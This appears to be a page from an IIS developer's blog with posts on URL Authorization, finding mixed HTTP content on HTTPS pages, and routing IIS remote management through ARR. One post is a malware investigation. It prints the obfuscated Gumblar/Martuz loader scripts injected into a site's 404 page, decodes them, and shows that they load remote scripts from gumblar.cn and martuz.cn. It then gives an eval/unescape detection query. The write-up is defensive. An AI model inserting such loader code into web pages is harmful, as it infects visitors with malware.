    What is also nice is that you can use URL Authorization to further restrict permissions in your pages for this users, for example, if I didn't want a particular IIS Manager User (say MyIisManagerUser) to access the Web Site I can just configure this in the same web.config:

    <configuration>
     
    <system.webServer>
           
    <security>
               
    <authorization>
                   
    <add accessType="Deny" users="MyIisManagerUser" />
                </
    authorization>
           
    </security>
     
    </system.webServer>
    </configuration>

    If you want to learn more about remote administration and how to configure it you can read: http://learn.iis.net/page.aspx/159/configuring-remote-administration-and-feature-delegation-in-iis-7/

  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit

    • 3 Comments

    The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. He downloaded the HTML pages and tried looking for anything suspicious on them, however he was not able to find anything. My friend then went back to his Hosting provider and mentioned the fact that they were not able to find anything problematic and that if it could be something with the server configuration, to which they replied in a sarcastic way that it was probably ignorance on his Web site designer.

    Enter IIS SEO Toolkit

    So of course I decided the first thing I would do is to start by crawling the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site would have. First thing I knew is usually malware hides either in executables or scripts on the server, so I started looking for the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.

    img01

    I was surprised to no found a single executable and to only see two very simple javascripts which looked not like malware in any way. So based on previous knowledge I knew that malware in HTML pages usually is hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features since they exist for a reason but it was a good way to get scoping the pages.

    Gumblar and Martuz.cn Malware on sight

    img02

    After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double clicking in any of them and looking at the HTML markup content made it immediately obvious they were malware infected, look at the following markup:

    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    -->
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
     
    --></script><BODY>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at **********
    </ADDRESS>
    </BODY>
    </HTML>

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

    For those of you like me that do not particularly enjoy reading encoded Javascript what these two scripts do is just unescape the funky looking string and then execute it. I have un-encoded the script that would get executed and showed it below just to show case how this malware works. Note how they special case a couple browsers including Chrome to request then a particular script that will cause the real damage.

    var a = "ScriptEngine", 
       
    b = "Version()+", 
       
    j = "", 
       
    u = navigator.userAgent; 
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) { 
       
    zrvzts = "A"; 
       
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;"); 
       
    document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>"); 
    }

    And:

    var a="ScriptEngine",
       
    b="Version()+",
       
    j="",u=navigator.userAgent;
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
       
    zrvzts="A";
       
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//martuz.cn/vid/?id="+j+"><\/script>");
    }

    Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.

    Final data

    Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web Application but the infection is in the Error Pages that are being served from the Server when an error happens. Next step to be able to guide them with more specifics I needed to determine the Web server that they were using, to do that it is as easy as just inspecting the headers in the IIS SEO Toolkit which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With a big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file for ErrorDocument and that would show them which files were infected and if it was a problem in their application or the server.

    Case Closed

    Turns out that after they went back to their Hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me quickly identify this based on the fact that is able to see the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of things in a lot simpler ways, but for Beta 1 for those who cares here is the query that you can save in an XML file and use "Open Query" to see if you are infected with these malware.

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
     
    <filter>
       
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
        <
    expression field="FileContents" operator="Contains" value="unescape" />
        <
    expression field="FileContents" operator="Contains" value="eval" />
      </
    filter>
     
    <displayFields>
       
    <field name="URL" />
        <
    field name="StatusCode" />
        <
    field name="Title" />
        <
    field name="Description" />
      </
    displayFields>
    </query>
  • CarlosAg Blog

    IIS SEO Toolkit: Find warnings of HTTP content linked by pages using HTTPS

    • 0 Comments

    Are you an developer/owner/publisher/etc of a site that uses HTTPS (SSL) for secure access? If you are, please continue to read.

    Have you ever visited a Web site that is secured using SSL (Secure Sockets Layer) just to get an ugly Security Warning message like:

    Do you want to view only the webpage content that was delivered securely?

    This webpage contains content that will not be delivered using a secure HTTPS connection, which could compromise the security of the entire webpage.

    image

    How frustrating is this for you? Do you think that end-users know what is the right answer to the question above? Honestly, I think it actually even feels like the Yes/No buttons and the phrasing of the question would cause me to click the wrong option.

    What this warning is basically trying to tell the user is that even though he/she navigated to a page that you thought was secured by using SSL, the page is consuming resources that are coming from an unsecured location, this could be scripts, style-sheets or other types of objects that could potentially pose a security risk since they could be tampered on the way or come from different locations.

    As a site owner/developer/publisher/etc should always make sure that you are not going to expose your customers to such a bad experience, leaving them with an answer that they can’t possibly choose right. For one if they ‘choose Yes’ they will get an incomplete experience being broken images, broken scripts or something worse; otherwise they can ‘choose No’ which is even worse since that means you are actually teaching them to ignore this warnings which could indeed in some cases be real signs of security issues.

    Bottom-line it should be imperative that any issue like this should be treated as a bug and fixed in the application if possible.

    But the big question is how do you find these issues? Well the answer is very simple yet extremely time consuming, just navigate to every single page of your site using SSL and as you do that examine every single resource in the page (styles, objects, scripts, etc) and see if the URL is pointing to a non-HTTPS location.

    Enter the IIS Search Engine Optimization (SEO) Toolkit.

    The good news is that using the SEO Toolkit is extremely simple to find these issues.

    1. To do that just start a new Analysis using the IIS SEO Toolkit using the HTTPS URL of your site, for example: https://www.example.com/
    2. Once the analysis is over just select the option “Query->Open Query” and open the following XML file:
    3. <?xml version="1.0" encoding="utf-8"?>
      <query dataSource="links">
       
      <filter>
         
      <expression field="LinkingUrl" operator="Begins" value="https://" />
          <
      expression field="LinkedUrl" operator="Begins" value="http://" />
          <
      expression field="LinkType" operator="NotEquals" value="Link" />
          <
      expression field="LinkType" operator="NotEquals" value="Rss" />
        </
      filter>
       
      <displayFields>
         
      <field name="LinkingUrl" />
          <
      field name="LinkedUrl" />
          <
      field name="LinkedStatus" />
          <
      field name="LinkType" />
        </
      displayFields>
      </query>
    4. Just by doing that it will open a Query Window that will show all the links in your site that have such a problem. Note that the query simply looks for all the resources that are being linked by a URL that begins with HTTPS and that the target resource is using HTTP and that are not normal links (since they do not have that problem).
    5. This is how my quick repro looks like. Note that it actually tells you the type of resource it is (an image and a style in this case). Additionally if you double click the row it will show you exactly the place in the markup where the problem occurs so you can easily fix it.

    image

    Summary

    Using the IIS SEO Toolkit and it powerful Query Engine you can easily detect conditions on your site that otherwise would take an incredible amount of time and that would be prohibitively expensive to do constantly.

  • CarlosAg Blog

    Application Request Routing and the IIS 7.0 Web Management Service

    • 1 Comments

    Yesterday I was having a conversation with Anil Ruia who happens to be the ARR (Application Request Routing) developer and based on customer feedback we discussed the idea of using ARR in the context of Remote Management in IIS which solves a question that several people asked me before and thought it would be fun to try it out.

    Basically the question that I got asked was "Can I have a single entry-point exposed for Remote Management?", or in other words "Can I provide users with remote administration giving them a single server name like management.myhostingcompany.com, instead of having to give them the specific machine name where their site lives?". So far the answer to these questions was "not easily", however with the use of ARR and URL Rewriter we will see how easy it is to achieve this.

    The only thing you need for this to work is install the new URL Rewrite and ARR Module both available here http://blogs.iis.net/bills/archive/2008/07/09/new-iis7-releases-url-rewrite-application-routing-and-load-balancing-and-powershell-cmd-lets.aspx.

    Background

    The Web Management Service (WMSvc) is the service that enables remote administration for IIS 7.0 Manager, providing an HTTPS end-point that exposes functionality similar to Web Services to manage the Web Server (IIS) remotely. This service uses HTTPS for its communication and exposes several configuration options that support giving access to Non-Windows Users (What we call IIS Manager Users), provide a list of IP Restrictions, support only local connections and many more that can be managed using the Management Service feature inside IIS Manager.

    To enable remote administration typically you need to: 1) Configure a valid Certificate for SSL, 2) Allow Remote Connections and 3) Start the WMSvc Service, all of which can be performed in IIS Manager. Once you have successfully enabled the remote service you should be able to go to a different machine and be able to connect remotely.

    Note: If you are using Windows Vista, Windows XP, or Windows 2003 to connect to a Windows Server 2008 you need to download and install the client to do this: http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1626

    However, one of the drawbacks is that in order to be able to connect to a Web Site, the end-user needs to know the machine name, as well as the name of the Web Site they will be connecting to, which sometimes it would be better to be dynamic. The following image shows the information required to enter when connecting to a Web Site. Note that if connecting to an application you will also need to enter the name of the application.

    ConnectingToSite

    However, this can potentially reduce the flexibility for deployment options, since now your customers have specific knowledge of the physical machine and will limit the flexibility of moving the site to different machines or even changing the name of the site where it is being hosted.

    ARR and URL Rewrite to the rescue.

    ARR has several very interesting capabilities that are really useful for this scenario. First, we can configure it to act as a proxy and basically forward the requests to another server where they actually get processed. This is the simplest configuration option and what it allows you is to have something similar to the next image:

    WMSvcRouting

    To set up this configuration where a front-end management server forwards the IIS Remote Management requests to another server running WMSVC you have to:

    1. Install ARR and URL Rewrite in the Server that is intended to be used as the front-end for management requests. Lets call this ServerA.
    2. Create a new Web Site.
      1. Navigate to IIS Manager->Site
      2. Click Add Web Site.
      3. In the dialog set: Site name:ManagementSite, Binding: https, port: 8172 and choose a valid SSL certificate, specify a phisical path. Click OK
    3. Configure URL Rewrite to Route requests to the IIS Management Service running in the other computer.
      1. Navigate to IIS Manager->Sites->Management Site->URL Rewrite Module
      2. Click Add Rule
      3. Set: Name: RouteWMSvc, Pattern:.*, Rewrite URL:https://<RemoteServer>:8172/{R:0}, Stop Processing rules: Checked.
      4. This should generate a web.config with similar content (note that my backend, ie the RemoteServer in my case is carlosag2-iis below):

        <configuration>
           
        <system.webServer>
               
        <rewrite>
                   
        <rules>
                       
        <rule name="RouteWMSvc" stopProcessing="true">
                           
        <match url=".*" />
                            <
        action type="Rewrite" url="https://carlosag2-iis:8172/{R:0}" />
                        </
        rule>
                   
        </rules>
               
        </rewrite>
           
        </system.webServer>
        </configuration>

    4. Now you can run IIS Manager in any client machine, specify the ServerA as the machine name and specify any web site in the remote RemoteServer, the result will be that all requests will be forwarded to the WMSvc running in the remote server.

    Now, that is interesting and the scenario it allows you to do is potentially have WMSvc IP Request Filtering in the RemoteServer and only allow calls from the Management Server where you can do further configuration. Note that this also means that you can have a single public SSL Certificate in the management server and use privately issued certificates (or potentially even self-signed certificates in the remoteserver since you can control installing the certificate into the management server). It also means that the customers no longer use the physical name of the RemoteServer machine but instead connect to the Management Server allowing you to completely move them to another machine and not have to update your clients.

    Troubleshooting: If you are having troubles testing this, the best thing to do is enable Failed Request Tracing in the ManagementSite, which will tell you exactly what is going on. For example you will get entries like:

    Warning: ModuleName="ApplicationRequestRouting", Notification="EXECUTE_REQUEST_HANDLER", HttpStatus="502", HttpReason="Bad Gateway", HttpSubStatus="3", ErrorCode="2147954575", ConfigExceptionInfo=""

    If you lookup the ErrorCode, it is actually: ERROR_WINHTTP_SECURE_FAILURE, this means that you have most likely issues with the certificate. In my case, just to test this what I did is generate a self-signed certificate in the RemoteServer with the name of the machine (carlosag2-iis) and then I installed that certificate using the MMC certificates snap-in in the management server into the Trusted Root Certification Authority. Disclaimer Warning!! this is something you should only do for testing purposes or if you know what you are doing.

    More Advanced Stuff... Dynamically choosing the machine

    Now, trying to push the capabilities of this I decided to solve another requests that we've heard which is closely related "Can I have a single management server and dynamically route the requests to the machine where a particular site lives?"

    The following picture represents this, where the Management Server dynamically resolves the server that it should talk to using the URL Rewrite Maps functionality.

    WMSvcRoutingMultiple

    Turns out this is really simple using URL Rewrite, basically you can write a Rewrite Rule that matches the Site name that is included as part of the Query String and use the Rewrite Maps support for figuring out the machine where this site lives. The following shows such a rule:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
     
    <system.webServer>
       
    <rewrite>
         
    <rules>
           
    <rule name="RouteWMSvc" stopProcessing="true">
             
    <match url=".*" />
              <
    conditions>
               
    <add input="{QUERY_STRING}" pattern="Site=([^&amp;]+)" />
              </
    conditions>
             
    <action type="Rewrite" url="https://{ServersTable:{C:1}}:8172/{R:0}" appendQueryString="true" />
            </
    rule>
         
    </rules>
         
    <rewriteMaps>
           
    <rewriteMap name="ServersTable">
             
    <add key="CarlosAgWebSite" value="carlosag2-iis" />
              <
    add key="SomeOtherUserSite" value="carlosag1-iis" />
              <
    add key="SomeOtherUserSite2" value="carlosag3-iis" />
            </
    rewriteMap>
         
    </rewriteMaps>
       
    </rewrite>
     
    </system.webServer>
    </configuration>

    Basically, URL Rewrite matches every request and uses the condition entry to parse the Query String and find the Site name within it. With it, it and using the Map ServersTable to resolve the machine name based on the Site name it rewrites the request to the machine where its currently located. This makes it basically route "https://localhost:8172/Service.axd?...&Site=CarlosAgWebSite" into https://carlosag2-iis:8172/Service.axd?...&Site=CarlosAgWebSite. The end result is that can dynamically at any time just update this table and make ARR route the requests to the right machine giving you complete flexibility on the deployment of sites.

    One thing to note is that URL Rewrite is one of the ways you can make the ARR scenario work, however, you could also write your own module that uses any dynamic behavior such as going to a database or a provisioning system or anything else and rewrite the URL programmatically in a way that ARR will understand it and do the routing automatically.

    Also, worth to mention that ARR has way more features than just this, making it possible to load-balance requests and many more interesting stuff that I will try to get back in a future post.

    With all this you can imagine several benefits, such as single public end-point for remote management of multiple servers, only one valid certificate is needed facing public machines, you can relocate sites at your own will since customers will never really know the real machine name where their site lives, you can use a similar technique to rewrite even the Site Name and give them some friendly name such as their user name or whatever.

    Acknowledgements: I want to thank Anil Ruia and Daniel Vasquez Lopez who helped figuring out a few issues during this blog and Ruslan Yakushev and Won Yoo for reviewing its technical accuracy.

Page 4 of 10 (91 items) «23456»